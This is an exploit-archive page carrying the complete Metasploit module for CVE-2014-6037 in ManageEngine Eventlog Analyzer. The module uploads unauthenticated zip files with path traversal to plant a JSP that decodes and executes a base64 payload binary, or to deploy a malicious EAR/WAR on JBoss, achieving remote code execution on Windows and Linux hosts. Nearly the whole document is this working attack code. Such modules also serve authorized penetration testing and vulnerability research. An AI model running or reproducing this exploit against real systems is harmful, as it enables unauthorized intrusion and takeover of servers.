exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Eventlog Analyzer Arbitrary File Upload

ManageEngine Eventlog Analyzer Arbitrary File Upload
Posted Sep 12, 2014
Authored by h0ng10 | Site metasploit.com

This Metasploit module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer. The vulnerability exists in the agentUpload servlet which accepts unauthenticated file uploads and handles zip file contents in a insecure way. By combining both weaknesses a remote attacker can achieve remote code execution. This Metasploit module has been tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server, while versions 8.1+ are only exploitable via a JSP upload.

tags | exploit, remote, code execution, file upload
systems | linux, windows
advisories | CVE-2014-6037
SHA-256 | 7a0773137d222dd2f47bbc5c83d57f0b5cff637f5610d1a372378c64bc78f404

ManageEngine Eventlog Analyzer Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
The vulnerability exists in the agentUpload servlet which accepts unauthenticated
file uploads and handles zip file contents in a insecure way. By combining both
weaknesses a remote attacker can achieve remote code execution. This module has been
tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
while versions 8.1+ are only exploitable via a JSP upload.
},
'Author' =>
[
'h0ng10', # Vulnerability discovery
'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6037' ],
[ 'OSVDB', '110642' ],
[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/86' ]
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => %w{ java linux win },
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'WfsDelay' => 30
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'))

register_options(
[
Opt::RPORT(8400),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
], self.class)
end


def get_version
res = send_request_cgi({
'uri' => normalize_uri("event/index3.do"),
'method' => 'GET'
})

if res and res.code == 200
if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
return $1
end
end

return "0"
end


def check
version = get_version
if version >= "7" and version <= "9"
# version 7 to < 8.1 detection
res = send_request_cgi({
'uri' => normalize_uri("event/agentUpload"),
'method' => 'GET'
})
if res and res.code == 405
return Exploit::CheckCode::Appears
end

# version 8.1+ detection
res = send_request_cgi({
'uri' => normalize_uri("agentUpload"),
'method' => 'GET'
})
if res and res.code == 405 and version == 8
return Exploit::CheckCode::Appears
else
# We can't be sure that it is vulnerable in version 9
return Exploit::CheckCode::Detected
end

else
return Exploit::CheckCode::Safe
end
end


def create_zip_and_upload(payload, target_path, is_payload = true)
# Zipping with CM_STORE to avoid errors decompressing the zip
# in the Java vulnerable application
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file(target_path, payload)

post_data = Rex::MIME::Message.new
post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")

data = post_data.to_s

if is_payload
print_status("#{peer} - Uploading payload...")
end
res = send_request_cgi({
'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

if res and res.code == 200 and res.body.empty?
if is_payload
print_status("#{peer} - Payload uploaded successfully")
end
register_files_for_cleanup(target_path.gsub("../../", "../"))
return true
else
return false
end
end


def pick_target
return target if target.name != 'Automatic'

print_status("#{peer} - Determining target")

version = get_version

if version == "7"
return targets[1]
end

os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
if version == "8"
# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
return targets[1]
end
return nil
end

res = send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})

if res and res.code == 200
if res.body.to_s =~ /Windows/
return targets[2]
else
# assuming Linux
return targets[3]
end
end

return nil
end


def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)

native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

var_raw = rand_text_alpha(rand(8) + 3)
var_ostream = rand_text_alpha(rand(8) + 3)
var_buf = rand_text_alpha(rand(8) + 3)
var_decoder = rand_text_alpha(rand(8) + 3)
var_tmp = rand_text_alpha(rand(8) + 3)
var_path = rand_text_alpha(rand(8) + 3)
var_proc2 = rand_text_alpha(rand(8) + 3)

if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|

var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end

jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();

BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|

jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")

return jsp
end


def exploit_native
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end

jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"

jsp_payload = generate_jsp_payload
if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end

return jsp_name
end


def exploit_java
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
end

target_dir = "../../server/default/deploy/"

# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })

# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}

# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + ".war", war_payload.to_s)
ear_file.add_file("META-INF/application.xml", app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"

if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end

print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
sleep(datastore['SLEEP'])
return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
end


def exploit
if datastore['SLEEP'] < 0
print_error("The SLEEP datastore option shouldn't be negative")
return
end

@my_target = pick_target
if @my_target.nil?
print_error("#{peer} - Unable to select a target, we must bail.")
return
else
print_status("#{peer} - Selected target #{@my_target.name}")
end

if @my_target == targets[1]
exploit_path = exploit_java
else
exploit_path = exploit_native
end

print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(exploit_path),
'method' => 'GET'
})
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close